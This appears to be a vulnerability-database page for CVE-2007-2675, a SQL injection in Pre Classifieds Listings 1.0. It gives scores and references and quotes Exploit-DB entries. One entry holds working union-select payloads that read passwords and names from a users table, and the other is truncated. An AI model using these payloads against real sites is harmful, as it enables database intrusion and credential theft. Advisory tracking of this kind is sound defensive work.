CVE-2007-2675
published 2007-05-14CVE-2007-2675: SQL injection vulnerability in search.php in Pre Classifieds Listings 1.0 allows remote attackers to execute arbitrary SQL commands via the category parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.77%
75.4th percentile
SQL injection vulnerability in search.php in Pre Classifieds Listings 1.0 allows remote attackers to execute arbitrary SQL commands via the category parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pre_projects | pre_classifieds_listings | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASP Classifieds - SQL Injection
exploitdb·2012-03-17
CVE-2007-2675 ASP Classifieds - SQL Injection
ASP Classifieds - SQL Injection
---
# Exploit Title: ASP Classifieds Sql Injection
# Date: 17/03/2012
# Author: r45c4l
# Email: [email protected]
# Script url: http://preproject.com/pclasp/home/default.asp
# Version: N/A
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
ASP Classifieds is one of the most customizable Classified ad program
that exist for ASP and Access. Unlimited Images , unlimited categories
and much much more makes it perfect for those who wants to set up a used
stamps classifieds to those wanting to show and sell real estates.
Product Cost : 58$
=======================Exploit====================================
---ICW---
[ EXPL0!T ]
SQL I
Exploit-DB
Pre Classifieds Listings 1.0 - SQL Injection
exploitdb·2007-05-03
CVE-2007-2675 Pre Classifieds Listings 1.0 - SQL Injection
Pre Classifieds Listings 1.0 - SQL Injection
---
Pre Classifieds Listings v1.0 Remote SQL Injection
Found: Cyber-Security.org
Exploit:
search.php?category=-1/**/union/**/select/**/pass/**/from/**/users/*
search.php?category=-1/**/union/**/select/**/name/**/from/**/users/*
Example: http://preproject.com/phppcl/
# milw0rm.com [2007-05-03]
No writeups or analysis indexed.
http://osvdb.org/35597http://secunia.com/advisories/25144http://www.securityfocus.com/bid/23795http://www.securityfocus.com/bid/52543http://www.securityfocus.com/bid/52543/exploithttp://www.vupen.com/english/advisories/2007/1655https://exchange.xforce.ibmcloud.com/vulnerabilities/34037https://www.exploit-db.com/exploits/3840http://osvdb.org/35597http://secunia.com/advisories/25144http://www.securityfocus.com/bid/23795http://www.securityfocus.com/bid/52543http://www.securityfocus.com/bid/52543/exploithttp://www.vupen.com/english/advisories/2007/1655https://exchange.xforce.ibmcloud.com/vulnerabilities/34037https://www.exploit-db.com/exploits/3840
2007-05-14
Published